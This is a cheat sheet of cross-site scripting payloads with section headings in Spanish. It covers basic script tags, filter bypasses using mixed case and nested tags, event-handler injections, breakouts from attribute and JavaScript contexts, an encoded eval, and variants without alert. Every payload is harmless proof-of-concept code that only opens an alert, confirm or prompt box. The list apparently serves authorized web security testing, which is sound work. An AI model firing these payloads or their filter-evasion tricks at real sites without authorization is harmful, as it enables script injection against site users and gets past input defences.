# Payloads basicos
<script>alert(1)</script>
<script>alert('XSS')</script>

# Bypass filtro script (mayusculas)
<SCRIPT>alert(1)</SCRIPT>
<sCrIpT>alert(1)</sCrIpT>

# Bypass filtro script (recursion)
<scr<script>ipt>alert(1)</scr</script>ipt>

# Payloads con eventos HTML
<img src=x onerror=alert(1)>
<img src=x onerror=alert('XSS')>
<body onload=alert(1)>
<svg onload=alert(1)>
<input onfocus=alert(1) autofocus>

# Payloads sin parentesis
<img src=x onerror=alert`1`>

# Payloads en contexto de atributo
" onmouseover="alert(1)
' onmouseover='alert(1)
" autofocus onfocus="alert(1)

# Payloads en contexto JavaScript
';alert(1)//
";alert(1)//
\';alert(1)//

# Payloads con codificacion
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

# Payloads sin la palabra alert
<script>confirm(1)</script>
<script>prompt(1)</script>
<img src=x onerror=confirm(1)>